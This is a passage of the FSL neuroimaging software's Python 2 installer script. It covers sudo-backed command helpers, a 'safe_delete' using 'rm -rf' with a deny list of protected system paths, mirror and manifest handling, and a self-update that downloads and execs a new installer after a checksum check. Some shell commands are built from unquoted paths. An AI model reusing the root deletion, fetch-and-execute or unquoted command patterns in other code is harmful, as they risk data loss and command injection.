sys.stdout.flush()
def start(self):
if not self.quiet:
self.busy = True
threading.Thread(target=self.spin_it).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
def run_cmd_dropstdout(command, as_root=False):
'''Run the command and return result.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
else:
sudo_pwd = ''
try:
my_spinner = Spinner(quiet=MsgUser.isquiet())
my_spinner.start()
cmd = Popen(command_line, stdin=PIPE, stdout=None, stderr=PIPE)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
(_, error) = cmd.communicate()
except Exception:
raise
finally:
my_spinner.stop()
if cmd.returncode:
MsgUser.debug("An error occured (%s, %s)" % (cmd.returncode, error))
raise RunCommandError(error)
def run_cmd(command, as_root=False):
'''Run the command and return result.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
else:
sudo_pwd = ''
MsgUser.debug("Will call %s" % (command_line))
try:
my_spinner = Spinner(quiet=MsgUser.isquiet())
my_spinner.start()
cmd = Popen(command_line, stdin=PIPE, stdout=PIPE, stderr=PIPE)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
(output, error) = cmd.communicate()
except Exception:
raise
finally:
my_spinner.stop()
if cmd.returncode:
MsgUser.debug("An error occured (%s, %s)" % (cmd.returncode, error))
raise RunCommandError(error)
MsgUser.debug("Command completed successfully (%s)" % (output))
return output
def run_cmd_displayoutput(command, as_root=False):
'''Run the command and display output.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
MsgUser.debug("Will call %s" % (command_line))
cmd = Popen(
command_line,
stdin=PIPE, stdout=sys.stdout, stderr=sys.stderr)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
cmd.communicate()
return_code = cmd.returncode
else:
return_code = call(command_line)
if return_code:
MsgUser.debug("An error occured (%s)" % (return_code))
raise RunCommandError(return_code)
MsgUser.debug("Command completed successfully")
def check_sudo(sudo_pwd):
command_line = ['sudo', '-S', 'true']
MsgUser.debug("Checking sudo password")
cmd = Popen(
command_line,
stdin=PIPE,
stdout=DEVNULL,
stderr=DEVNULL
)
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
cmd.communicate()
if cmd.returncode != 0:
return False
else:
return True
class SudoPasswordError(Exception):
pass
@memoize
def get_sudo_pwd():
'''Get the sudo password from the user'''
MsgUser.message("We require your password to continue...")
attempts = 0
valid = False
while attempts < 3 and not valid:
sudo_pwd = getpass.getpass('password: ')
valid = check_sudo(sudo_pwd)
if not valid:
MsgUser.failed("Incorrect password")
attempts += 1
if not valid:
raise SudoPasswordError()
return sudo_pwd
class DeletionRefused(Exception):
pass
class SafeDeleteError(Exception):
pass
def safe_delete(fs_object, as_root=False):
'''Delete file/folder, becoming root if necessary.
Run some sanity checks on object'''
banned_items = ['/', '/usr', '/usr/bin', '/usr/local', '/bin',
'/sbin', '/opt', '/Library', '/System', '/System/Library',
'/var', '/tmp', '/var/tmp', '/lib', '/lib64', '/Users',
'/home', '/Applications', '/private', '/etc', '/dev',
'/Network', '/net', '/proc']
if os.path.isdir(fs_object):
del_opts = "-rf"
else:
del_opts = '-f'
if fs_object in banned_items:
raise DeletionRefused('Will not delete %s!' % (fs_object))
command_line = " ".join(('rm', del_opts, fs_object))
try:
result = run_cmd(command_line, as_root)
except RunCommandError, e:
raise SafeDeleteError(str(e))
return result
class MoveError(Exception):
pass
def move(source, target, as_root):
try:
run_cmd_dropstdout(" ".join(('mv', source, target)), as_root)
except RunCommandError, e:
raise MoveError(str(e))
class IsDirectoryError(Exception):
pass
class CopyFileError(Exception):
pass
def copy_file(fname, destination, as_root):
'''Copy a file using sudo if necessary'''
MsgUser.debug("Copying %s to %s (as root? %s)" % (
fname, destination, as_root))
if os.path.isdir(fname):
raise IsDirectoryError('Source (%s) is a directory!' % (fname))
if os.path.isdir(destination):
# Ensure that copying into a folder we have a terminating slash
destination = destination.rstrip('/') + "/"
copy_opts = '-p'
fname = '"%s"' % fname
destination = '"%s"' % destination
command_line = " ".join(('cp', copy_opts, fname, destination))
try:
result = run_cmd(command_line, as_root)
except RunCommandError, e:
raise CopyFileError(str(e))
return result
def file_contains(fname, search_for):
'''Equivalent of grep'''
regex = compile(escape(search_for))
found = False
MsgUser.debug("In file_contains.")
MsgUser.debug("Looking for %s in %s." % (search_for, fname))
f = open(fname, 'r')
for l in f:
if regex.search(l):
found = True
break
f.close()
return found
def file_contains_1stline(fname, search_for):
'''Equivalent of grep - returns first occurrence'''
regex = compile(escape(search_for))
found = ''
MsgUser.debug("In file_contains_1stline.")
MsgUser.debug("Looking for %s in %s." % (search_for, fname))
f = open(fname, 'r')
for l in f:
if regex.search(l):
found = l
break
f.close()
return found
def line_string_replace(line, search_for, replace_with):
return sub(escape(search_for), escape(replace_with), line)
def line_starts_replace(line, search_for, replace_with):
if line.startswith(search_for):
return replace_with + '\n'
return line
class MoveFileError(Exception):
pass
def move_file(from_file, to_file, requires_root=False):
'''Move a file, using /bin/cp via sudo if requested.
Will work around known bugs in python.'''
if requires_root:
try:
run_cmd_dropstdout(" ".join(
("/bin/cp", from_file, to_file)), as_root=True)
except RunCommandError, e:
MsgUser.debug(e)
raise MoveFileError("Failed to move %s (%s)" % (from_file, str(e)))
os.remove(from_file)
else:
try:
move(from_file, to_file, requires_root)
except OSError, e:
# Handle bug in some python versions on OS X writing to NFS home
# folders, Python tries to preserve file flags but NFS can't do
# this. It fails to catch this error and ends up leaving the file
# in the original and new locations!
if e.errno == 45:
# Check if new file has been created:
if os.path.isfile(to_file):
# Check if original exists
if os.path.isfile(from_file):
# Destroy original and continue
os.remove(from_file)
else:
try:
run_cmd_dropstdout("/bin/cp %s %s" % (
from_file, to_file), as_root=False)
except RunCommandError, e:
MsgUser.debug(e)
raise MoveFileError("Failed to copy from %s (%s)" % (
from_file, str(e)))
os.remove(from_file)
else:
raise
except Exception:
raise
class EditFileError(Exception):
pass
def edit_file(fname, edit_function, search_for, replace_with, requires_root):
'''Search for a simple string in the file given and replace
it with the new text'''
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
src = open(fname)
for line in src:
line = edit_function(line, search_for, replace_with)
tmpfile.write(line)
src.close()
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
except MoveFileError, e:
MsgUser.debug(e)
os.remove(tmpfname)
raise EditFileError("Failed to edit %s (%s)" % (fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror)
raise EditFileError("Failed to edit %s (%s)" % (fname, str(e)))
MsgUser.debug("Modified %s (search %s; replace %s)." % (
fname, search_for, replace_with))
class AddToFileError(Exception):
pass
def add_to_file(fname, add_lines, requires_root):
'''Add lines to end of a file'''
if isinstance(add_lines, basestring):
add_lines = add_lines.split('\n')
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
src = open(fname)
for line in src:
tmpfile.write(line)
src.close()
tmpfile.write('\n')
for line in add_lines:
tmpfile.write(line)
tmpfile.write('\n')
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
except MoveFileError, e:
os.remove(tmpfname)
MsgUser.debug(e)
raise AddToFileError("Failed to add to file %s (%s)" % (
fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror + tmpfname + fname)
raise AddToFileError("Failed to add to file %s" % (fname))
MsgUser.debug("Modified %s (added %s)" % (fname, '\n'.join(add_lines)))
class CreateFileError(Exception):
pass
def create_file(fname, lines, requires_root):
'''Create a new file containing lines given'''
if isinstance(lines, basestring):
lines = lines.split('\n')
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
for line in lines:
tmpfile.write(line)
tmpfile.write('\n')
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
except CreateFileError, e:
os.remove(tmpfname)
MsgUser.debug(e)
raise CreateFileError("Failed to edit %s (%s)" % (fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror)
raise CreateFileError("Failed to create %s" % (fname))
MsgUser.debug("Created %s (added %s)" % (fname, '\n'.join(lines)))
class UnsupportedOs(Exception):
pass
class Host(object):
'''Work out which platform we are running on'''
o_s = platform.system().lower()
arch = platform.machine()
applever = ''
os_type = os.name
supported = True
if o_s == 'darwin':
vendor = 'apple'
version = Version(platform.release())
(applever, _, _) = platform.mac_ver()
glibc = ''
elif o_s == 'linux':
if hasattr(platform, 'linux_distribution'):
# We have a modern python (>2.4)
(vendor, version, _) = platform.linux_distribution(
full_distribution_name=0)
# check if vendor still empty from above call (useful for AWS linux 2 or other rare OSes)
if not vendor:
(vendor, version, _) = platform.linux_distribution(supported_dists=['system'])
else:
(vendor, version, _) = platform.dist()
vendor = vendor.lower()
version = Version(version)
glibc = platform.libc_ver()[1]
else:
supported = False
if arch == 'x86_64':
bits = '64'
elif arch == 'i686':
bits = '32'
elif arch == 'Power Macintosh':
bits = ''
def is_writeable(location):
'''Check if we can write to the location given'''
writeable = True
try:
tfile = tempfile.NamedTemporaryFile(mode='w+b', dir=location)
tfile.close()
except OSError, e:
if e.errno == errno.EACCES or e.errno == errno.EPERM:
writeable = False
else:
raise
return writeable
def is_writeable_as_root(location):
'''Check if sudo can write to a given location'''
# This requires us to use sudo
(f, fname) = temp_file_name(mode='w')
f.write("FSL")
f.close()
result = False
tmptarget = '/'.join((location, os.path.basename(fname)))
MsgUser.debug(" ".join(('/bin/cp', fname, tmptarget)))
try:
run_cmd_dropstdout(" ".join(('/bin/cp',
fname, tmptarget)), as_root=True)
result = True
os.remove(fname)
run_cmd_dropstdout(" ".join(('/bin/rm',
'-f', tmptarget)), as_root=True)
except RunCommandError, e:
MsgUser.debug(e)
os.remove(fname)
result = False
MsgUser.debug("Writeable as root? %s" % (result))
return result
class ChecksumCalcError(Exception):
pass
def sha256File(filename, bs=1048576):
'''Returns the sha256 sum of the given file.'''
MsgUser.message("Checking FSL package")
try:
import hashlib
f = open(filename, 'rb')
pb = Progress_bar(mx=os.path.getsize(filename), percentage=True)
pb.position = 0
fhash = hashlib.sha256()
data = f.read(bs)
while len(data) == bs:
fhash.update(data)
data = f.read(bs)
pb.position += len(data)
pb.update(pb.position)
fhash.update(data)
f.close()
return fhash.hexdigest()
except ImportError:
# No SHA256 support on python pre-2.5 so call the OS to do it.
try:
result = run_cmd(" ".join(('sha256sum', '-b', filename)))
return parsesha256sumfile(result)
except RunCommandError, e:
MsgUser.debug("SHA256 calculation error %s" % (str(e)))
raise ChecksumCalcError
def parsesha256sumfile(sha256string):
'''Returns sha256 sum extracted from the output of sha256sum or shasum -a
256 from OS X/Linux platforms'''
(sha256, _) = sha256string.split("*")
return sha256.strip()
def md5File(filename, bs=1048576):
'''Returns the MD5 sum of the given file.'''
MsgUser.message("Checking FSL package")
try:
import hashlib
fhash = hashlib.md5()
except ImportError:
import md5
fhash = md5.new()
f = open(filename, 'rb')
pb = Progress_bar(mx=os.path.getsize(filename), percentage=True)
pb.position = 0
data = f.read(bs)
while len(data) == bs:
fhash.update(data)
data = f.read(bs)
pb.position += len(data)
pb.update(pb.position)
fhash.update(data)
f.close()
return fhash.hexdigest()
def file_checksum(filename, chktype='sha256'):
if chktype == 'sha256':
return sha256File(filename)
if chktype == 'md5':
return md5File(filename)
else:
raise ChecksumCalcError('Unrecognised checksum type')
class OpenUrlError(Exception):
pass
def open_url(url, start=0, timeout=20):
socket.setdefaulttimeout(timeout)
MsgUser.debug("Attempting to download %s." % (url))
try:
req = urllib2.Request(url)
if start != 0:
req.headers['Range'] = 'bytes=%s-' % (start)
rf = urllib2.urlopen(req)
except urllib2.HTTPError, e:
MsgUser.debug("%s %s" % (url, e.msg))
raise OpenUrlError("Cannot find file %s on server (%s). "
"Try again later." % (url, e.msg))
except urllib2.URLError, e:
if type(e.reason) != str:
errno = e.reason.args[0]
if len(e.reason.args) > 1:
message = e.reason.args[1]
# give up on trying to identify both the errno and message
else:
message = e.reason.args
if errno == 8:
# Bad host name
MsgUser.debug("%s %s" % (url,
"Unable to find FSL download "
"server in the DNS"))
else:
# Other error
MsgUser.debug("%s %s" % (url, message))
else:
message = str(e.reason)
raise OpenUrlError(
"Cannot find %s (%s). Try again later." % (url, message))
except socket.timeout, e:
MsgUser.debug(e)
raise OpenUrlError("Failed to contact FSL web site. Try again later.")
return rf
class DownloadFileError(Exception):
pass
def download_file(url, localf, timeout=20):
'''Get a file from the url given storing it in the local file specified'''
try:
rf = open_url(url, 0, timeout)
except OpenUrlError, e:
raise DownloadFileError(str(e))
metadata = rf.info()
rf_size = int(metadata.getheaders("Content-Length")[0])
dl_size = 0
block = 16384
x = 0
y = 0
pb = Progress_bar(x, y, rf_size, numeric=True)
for attempt in range(1, 6):
# Attempt download 5 times before giving up
pause = timeout
try:
try:
lf = open(localf, 'ab')
except Exception:
raise DownloadFileError("Failed to create temporary file.")
while True:
buf = rf.read(block)
if not buf:
break
dl_size += len(buf)
lf.write(buf)
pb.update(dl_size)
lf.close()
except (IOError, socket.timeout), e:
MsgUser.debug(e.strerror)
MsgUser.message("\nDownload failed re-trying (%s)..." % attempt)
pause = 0
if dl_size != rf_size:
time.sleep(pause)
MsgUser.message("\nDownload failed re-trying (%s)..." % attempt)
try:
rf = open_url(url, dl_size, timeout)
except OpenUrlError, e:
MsgUser.debug(e)
else:
break
if dl_size != rf_size:
raise DownloadFileError("Failed to download file.")
def build_url_with_protocol(protocol, base, parts):
part_l = [protocol + '://' + base.strip('/')]
part_l.extend([x.strip('/') for x in parts])
return '/'.join(part_l)
def build_url(parts):
part_l = [parts[0].strip('/')]
part_l.extend([x.strip('/') for x in parts[1:]])
return '/'.join(part_l)
class SiteNotResponding(Exception):
pass
def fastest_mirror(main_mirrors, mirrors_file, timeout=20):
'''Find the fastest mirror for FSL downloads.'''
MsgUser.debug("Calculating fastest mirror")
socket.setdefaulttimeout(timeout)
# Get the mirror list from the url
fastestmirrors = {}
mirrorlist = []
for m in main_mirrors:
MsgUser.debug("Trying %s" % (m))
m_url = '/'.join((m.strip('/'), mirrors_file))
MsgUser.debug("Attempting to open %s" % (m_url))
try:
response = urllib2.urlopen(url=m_url)
except urllib2.HTTPError, e:
MsgUser.debug("%s %s" % (m_url, e.msg))
raise SiteNotResponding(e.msg)
except urllib2.URLError, e:
if isinstance(e.reason, socket.timeout):
MsgUser.debug("Time out trying %s" % (m_url))
raise SiteNotResponding(m)
else:
MsgUser.debug(str(e.reason))
raise SiteNotResponding(str(e.reason))
except socket.timeout, e:
MsgUser.debug(e)
raise SiteNotResponding(str(e))
except Exception, e:
MsgUser.debug("Unhandled exception %s" % (str(e)))
raise
else:
mirrorlist = response.read().strip().split('\n')
MsgUser.debug("Received the following "
"mirror list %s" % (mirrorlist))
continue
if len(mirrorlist) == 0:
raise ServerFailure("Cannot find FSL download servers")
# Check timings from the urls specified
if len(mirrorlist) > 1:
for mirror in mirrorlist:
MsgUser.debug("Trying %s" % (mirror))
then = time.time()
if mirror.startswith('http:'):
serverport = 80
elif mirror.startswith('https:'):
serverport = 443
else:
raise ServerFailure("Unrecognised protocol")
try:
mysock = socket.create_connection((mirror, serverport),
timeout)
pingtime = time.time() - then
mysock.close()
fastestmirrors[pingtime] = mirror
MsgUser.debug("Mirror responded in %s seconds" % (pingtime))
except socket.gaierror, e:
MsgUser.debug("%s can't be resolved" % (e))
except socket.timeout, e:
MsgUser.debug(e)
if len(fastestmirrors) == 0:
raise ServerFailure('Failed to contact any FSL download sites.')
download_url = fastestmirrors[min(fastestmirrors.keys())]
else:
download_url = mirrorlist[0]
return download_url
# Concept:
# Web app creates the following files:
# fslmirrorlist.txt - contains a list of mirror urls
# fslreleases.json - contains the available maps for oses
# mapping to a download url
# {'installer' {
# 'filename': 'fslinstaller.py',
# 'version': '3.0.0',
# 'date': '02/03/2017',
# 'checksum_type', 'sha256',
# 'checksum'},
# 'linux' : {
# 'centos' : {
# 'x86_64': {
# '6': {
# '5.0.9': {
# 'filename': 'fsl-5.0.9-centos6_64.tar.gz',
# 'version': '5.0.9',
# 'date': '01/02/2017',
# 'checksum_type', 'sha256',
# 'checksum': 'abf645662bcf4453235',
# },
# },
# },
# },
# 'rhel' : {'alias': 'centos'}},
# 'apple' : {
# 'darwin' : {
# 'x86_64': {
# '11': {
# ....
# },
# }
@memoize
def get_web_manifest(download_url, timeout=20):
'''Download the FSL manifest from download_url'''
socket.setdefaulttimeout(timeout)
MsgUser.debug("Looking for manifest at %s." % (download_url))
if HAS_JSON:
MsgUser.debug("Downloading JSON file")
return get_json(download_url + Settings.manifest_json)
else:
MsgUser.debug("Downloading CSV file")
return get_csv_dict(download_url + Settings.manifest_csv)
class GetFslDirError(Exception):
pass
@memoize
def get_fsldir(specified_dir=None, install=False):
'''Find the installed version of FSL using FSLDIR
or location of this script'''
def validate_fsldir(directory):
parent = os.path.dirname(directory)
if parent == directory:
raise GetFslDirError(
"%s appears to be the root folder" %
parent)
if not os.path.exists(parent):
raise GetFslDirError(
"%s doesn't exist" %
parent)
if not os.path.isdir(parent):
raise GetFslDirError(
"%s isn't a directory" %
parent)
if (os.path.exists(directory) and not
os.path.exists(os.path.join(
directory, 'etc', 'fslversion'
))):
raise GetFslDirError(
"%s exists and doesn't appear to be an installed FSL folder" %
directory)
if specified_dir:
if install is False:
if not check_fsl_install(specified_dir):
raise GetFslDirError(
"%s isn't an 'fsl' folder" %
specified_dir)
else:
validate_fsldir(specified_dir)
return specified_dir
try:
fsldir = os.environ['FSLDIR']
try:
validate_fsldir(fsldir)
except GetFslDirError:
# FSLDIR environment variable is incorrect!
MsgUser.warning('FSLDIR environment variable '
'does not point at FSL install, ignoring...')
MsgUser.debug('FSLDIR is set to %s - '
'this folder does not appear to exist' % (fsldir))
fsldir = None
else:
fsldir = fsldir.rstrip('/')
if MsgUser.isquiet():
return fsldir
except KeyError:
# Look to see if I'm in an FSL install
try:
my_parent = os.path.dirname(
os.path.dirname(os.path.realpath(__file__)))
except NameError:
# Running in debugger - __file__ not set, assume it's cwd
my_parent = os.path.dirname(
os.path.dirname(os.getcwd()))
try:
validate_fsldir(my_parent)
fsldir = my_parent
except GetFslDirError:
fsldir = None
if not install:
MsgUser.debug("asking about %s" % (fsldir))
valid_dir = False
while not valid_dir:
fsldir = Settings.inst_qus.ask_question(
'inst_loc', default=fsldir)
try:
validate_fsldir(fsldir)
valid_dir = True
except GetFslDirError, e:
MsgUser.falied(str(e))
return fsldir
else:
if not MsgUser.isquiet():
valid_dir = False
while not valid_dir:
fsldir = Settings.inst_qus.ask_question(
'location', default=fsldir)
try:
validate_fsldir(fsldir)
valid_dir = True
except GetFslDirError, e:
MsgUser.failed(str(e))
MsgUser.message(
'''Hint - press Enter to select the default value '''
'''given in the square brackets.
If you are specifying a destination folder this needs to either be an existing
FSL install folder or a folder that doesn't already exist.''')
fsldir = None
else:
raise GetFslDirError(
"I can't locate FSL, try again using '-d <FSLDIR>' "
"to specify where to find the FSL install")
return fsldir
def archive_version(archive):
'''Takes the path to a FSL install file
and works out what version it is.'''
if not os.path.isfile(archive):
raise NotAFslVersion("%s is not a file" % (archive))
else:
# file is of form: fsl-V.V.V-platform.extensions
(_, vstring, _) = archive.strip().split('-', 2)
try:
return Version(vstring)
except ValueError:
raise NotAFslVersion(
"%s doesn't look like "
"a version number" % (vstring))
class NotAFslVersion(Exception):
pass
class GetInstalledVersionError(Exception):
pass
def get_installed_version(fsldir):
'''Takes path to FSLDIR and finds installed version details'''
MsgUser.debug("Looking for fsl in %s" % fsldir)
v_file = os.path.join(fsldir, 'etc', 'fslversion')
if os.path.exists(v_file):
f = open(v_file)
v_string = f.readline()
f.close()
try:
version = Version(v_string.strip())
except ValueError:
raise NotAFslVersion(
"%s not a valid "
"version string" % (v_string.strip()))
else:
MsgUser.debug(
"No version information found - "
"is this actually an FSL dir?")
raise GetInstalledVersionError(
"Cannot find the version information - "
"is this actually an FSL dir?")
MsgUser.debug("Found version %s" % (version))
return version
def which_shell():
return os.path.basename(os.getenv("SHELL"))
class SelfUpdateError(Exception):
pass
def self_update(server_url):
'''Check for and apply an update to myself'''
# See if there is a newer version available
if 'fslinstaller' in sys.argv[0]:
try:
installer = get_installer(server_url)
except GetInstallerError, e:
MsgUser.debug("Failed to get installer version %s." % (str(e)))
raise SelfUpdateError('Failed to get installer version. '
'Please try again later.')
MsgUser.debug("Server has version " + installer['version'])
if Version(installer['version']) <= version:
MsgUser.debug("Installer is up-to-date.")
return
# There is a new version available - download it
MsgUser.message("There is a newer version (%s) of the installer "
"(you have %s) updating..." % (
installer['version'], version))
(_, tmpfname) = temp_file_name(mode='w', close=True)
downloaded = False
while downloaded is False:
try:
file_url = '/'.join(
(Settings.mirror.rstrip('/'), installer['filename']))
download_file(
url=file_url,
localf=tmpfname)
if (
file_checksum(tmpfname, installer['checksum_type']) !=
installer['checksum']):
raise SelfUpdateError(
"Found update to installer but download "
"was corrupt. Please try again later.")
except DownloadFileError, e:
if Settings.mirror != Settings.main_mirror:
MsgUser.warning(
"Download from mirror failed, re-trying from "
"main FSL download site")
Settings.mirror = Settings.main_mirror
else:
MsgUser.debug("Failed to update installer %s." % (str(e)))
raise SelfUpdateError(
'Found update to installer but unable to '
'download the new version. Please try again.')
else:
downloaded = True
# Now run the new installer
# EXEC new script with the options we were given
os.chmod(tmpfname, 0755)
c_args = [sys.executable, tmpfname, ]
c_args.extend(sys.argv[1:])
MsgUser.debug(
"Calling %s %s" % (sys.executable, c_args))
os.execv(sys.executable, c_args)
else:
# We are now running the newly downloaded installer
MsgUser.ok('Installer updated to latest version %s' % (str(version)))
MsgUser.ok("Installer self update successful.")
class ServerFailure(Exception):
pass
class BadVersion(Exception):
pass
class GetInstallerError(Exception):
pass
def get_installer(server_url):
MsgUser.debug("Checking %s for "
"installer information" % (server_url))
manifest = get_web_manifest(server_url)
return manifest['installer']
@memoize
def get_releases(server_url):
'''Return a hash with all information about available
versions for this OS'''
computer = Host
MsgUser.debug("Getting web manifest")
manifest = get_web_manifest(server_url)
try:
os_definition = manifest[computer.o_s][computer.vendor]
except KeyError:
raise UnsupportedOs("%s %s not supported by this installer" % (
computer.o_s, computer.vendor
))
t_version = computer.version.major
alias_t = 'alias'
if alias_t in os_definition.keys():
if str(t_version) in os_definition[alias_t]:
os_parent = os_definition[alias_t][
str(t_version)]['parent']
t_version = os_definition[alias_t][
str(t_version)]['version']
os_definition = manifest[computer.o_s][os_parent]
if computer.arch not in os_definition.keys():
raise UnsupportedOs("%s %s not supported" % (
computer.vendor,
computer.arch
))
os_def = os_definition[computer.arch]
while t_version > 0:
MsgUser.debug("Trying version %s" % (t_version))
if str(t_version) not in os_def.keys():
MsgUser.debug("...not found")
t_version -= 1
else:
break
if t_version == 0:
raise UnsupportedOs("%s %s not supported" % (
computer.vendor,
computer.version.major
))
elif t_version != computer.version.major:
MsgUser.warning(
"%s %s not officially supported "
"- trying to locate support for an earlier "
"version - this may not work" % (
computer.vendor, computer.version.major))
return os_definition[computer.arch][str(t_version)]
class ExtraDownloadError(Exception):
pass
@memoize
def get_extra(server_url, extra_type):
'''Return a hash with all information about available
versions of source code'''
MsgUser.debug("Getting web manifest")
manifest = get_web_manifest(server_url)
try:
extra = manifest[extra_type]
except KeyError:
raise ExtraDownloadError("Unrecognised extra %s" % (extra_type))
return extra
class ImproperlyConfigured(Exception):
pass
def list_releases(url):
releases = get_releases(url)
MsgUser.message("Available FSL versions for this OS:")
MsgUser.debug(releases)
rels = []
for v, release in releases.items():
if 'date' in release:
rdate = release['date']
else:
rdate = "Third-party package"
rels.append((v, rdate))
for v, rdate in sorted(rels, reverse=True):
MsgUser.message("%s\t(%s)" % (v, rdate))
def list_builds(url):
'''Lists all available FSL builds. '''
manifest = dict(get_web_manifest(url))
MsgUser.message("All available FSL builds:")
centos = manifest['linux']['centos']['x86_64']
macos = manifest['darwin']['apple']['x86_64']
def get_platform(s):
match = re.match(r'^fsl-(.+)-(.+).tar.gz$', s)
plat = match.group(2)
return plat
fslversions = collections.defaultdict(set)
for builds in itertools.chain(centos.values(), macos.values()):
for fslversion, info in builds.items():
fslversions[fslversion].add(get_platform(info['filename']))
for fslversion, plats in fslversions.items():
MsgUser.message('%s - %s' % (fslversion, ', '.join(plats)))
def latest_release(url):
releases = get_releases(url)
MsgUser.debug("Got version information: %s" % (releases))
versions = [Version(x) for x in releases.keys()]
MsgUser.debug("Versions: %s" % (versions))
return releases[str(sorted(versions)[-1])]
class InstallInstallerError(Exception):
pass
def install_installer(fsldir):
'''Install this script into $FSLDIR/etc'''
targetfolder = os.path.join(fsldir, 'etc')
as_root = False
installer = os.path.abspath(__file__)
MsgUser.debug(
"Copying fslinstaller (%s) to %s" % (
installer,
targetfolder))
if not is_writeable(targetfolder):
if not is_writeable_as_root(targetfolder):
raise InstallInstallerError("Cannot write to folder as root user.")
else:
as_root = True
copy_file(
installer, os.path.join(targetfolder, "fslinstaller.py"),
as_root)
class InstallQuestions(object):
def __init__(self):
self.questions = {}
self.validators = {}
self.type = {}
self.default = {}
self.defaults = False
def add_question(self, key, question, default, qtype, validation_f):
self.questions[key] = question
self.default[key] = default
self.type[key] = qtype
self.validators[key] = validation_f
def ask_question(self, key, default=None):
# Ask a question
no_answer = True
validator = self.validators[key]
def parse_answer(q_type, answer):
if q_type == 'bool':
if answer.lower() == 'yes':
return True
else:
return False
else:
return answer
if not default:
default = self.default[key]
if self.defaults:
MsgUser.debug(self.questions[key])
MsgUser.debug("Automatically using the default %s" % (default))
self.answers[key] = parse_answer(self.type[key], default)
no_answer = False
while no_answer:
MsgUser.question(
"%s? %s:" % (
self.questions[key],
'[%s]' % (default)))
your_answer = raw_input()
MsgUser.debug("Your answer was %s" % (your_answer))
if your_answer == '':
MsgUser.debug("You want the default")
your_answer = default
if validator(your_answer):
answer = parse_answer(self.type[key], your_answer)
no_answer = False
MsgUser.debug("Returning the answer %s" % (answer))
return answer
def yes_no(answer):
if answer.lower() == 'yes' or answer.lower() == 'no':
return True
else:
MsgUser.message("Please enter yes or no.")
return False
def check_install_location(folder):
'''Don't allow relative paths'''
MsgUser.debug("Checking %s is an absolute path" % (folder))
if (folder == '.' or
folder == '..' or
folder.startswith('./') or
folder.startswith('../') or
folder.startswith('~')):
MsgUser.message("Please enter an absolute path.")
return False
return True
def external_validate(what_to_check):
'''We will validate elsewhere'''
return True
def check_fsl_install(fsldir):
'''Check if this folder contains FSL install'''
MsgUser.debug("Checking %s is an FSL install" % (fsldir))
if os.path.isdir(fsldir):
if os.path.exists(
os.path.join(fsldir, 'etc', 'fslversion')
):
return True
return False
def fsl_downloadname(suffix, version):
return 'fsl-%s-%s' % (
version, suffix)
class Settings(object):
version = version
title = "--- FSL Installer - Version %s ---" % (version)
main_server = 'fsl.fmrib.ox.ac.uk'
mirrors = [build_url_with_protocol('https',
main_server, ('fsldownloads',
'')), ]
mirrors_file = 'fslmirrorlist.txt'
manifest_json = 'manifest.json'
manifest_csv = 'manifest.csv'
main_mirror = mirrors[0]
mirror = main_mirror
applications = ['bin/fslview.app', 'bin/assistant.app']
x11 = {'bad_versions': [],
'download_url': "http://xquartz.macosforge.org/landing/",
'apps': ['XQuartz.app', 'X11.app', ],
'location': "/Applications/Utilities"}
default_location = '/usr/local/fsl'
post_inst_dir = "etc/fslconf"
inst_qus = InstallQuestions()
inst_qus.add_question('version_match',
"The requested version matches the installed "
"version - do you wish to re-install FSL",
'no', 'bool', yes_no)
inst_qus.add_question('location',
"Where would you like the FSL install to be "
"(including the FSL folder name)",
default_location, 'path', check_install_location)
inst_qus.add_question('del_old',
"FSL exists in the current location, "
"would you like to keep a backup of the old "
"version (N.B. You will not be able to use the old "
"version)",
'no', 'bool', yes_no)
inst_qus.add_question('create',
"Install location doesn't exist, should I create it",
'yes', 'bool', yes_no)
inst_qus.add_question('inst_loc',
"Where is the FSL folder (e.g. /usr/local/fsl)",
default_location, 'path', check_fsl_install)
inst_qus.add_question('skipmd5',
"I was unable to download the checksum of "
"the install file so cannot confirm it is correct. "
"Would you like to install anyway",
'no', 'bool', yes_no)
inst_qus.add_question('overwrite',
"There is already a local copy of the file, would "
"you like to overwrite it",
"yes", 'bool', yes_no)
inst_qus.add_question('upgrade',
"Would you like to install upgrade",
"yes", 'bool', yes_no)
inst_qus.add_question('update',
"Would you like to install update",
"yes", 'bool', yes_no)
def get_json(web_url):
MsgUser.debug("Opening "+web_url)
try:
url = open_url(web_url)
return json.load(url)
except OpenUrlError, e:
raise ServerFailure(str(e))
# [ linux, centos, x86_64, 6, filename, 'fname',
# version, 'version', date, 'date', checksum_type, 'checksum_type',
# checksum, 'checksum', supported, 'true/false', notes, 'notes',
# instructions, 'instructions']
# [ linux, redhat, alias, centos, supported, True/false, version, 'version' ]
# [ 'installer', filename, 'fname', version, 'version', date, 'date',
# checksum_type, 'checksum_type', checksum, 'checksum', supported,
# 'true/false', notes, 'notes', instructions, 'instructions']
# [ feeds, filename, 'fname', version, 'version',
# date, 'date', checksum_type, 'checksum_type', checksum, 'checksum',
# supported, 'true/false', notes, 'notes', instructions, 'instructions']
# [ sources, filename, 'fname', version, 'version',
# date, 'date', checksum_type, 'checksum_type', checksum, 'checksum',
# supported, 'true/false', notes, 'notes', instructions, 'instructions']
class AutoDict(dict):
'''Automatically create a nested dict'''
def __getitem__(self, item):
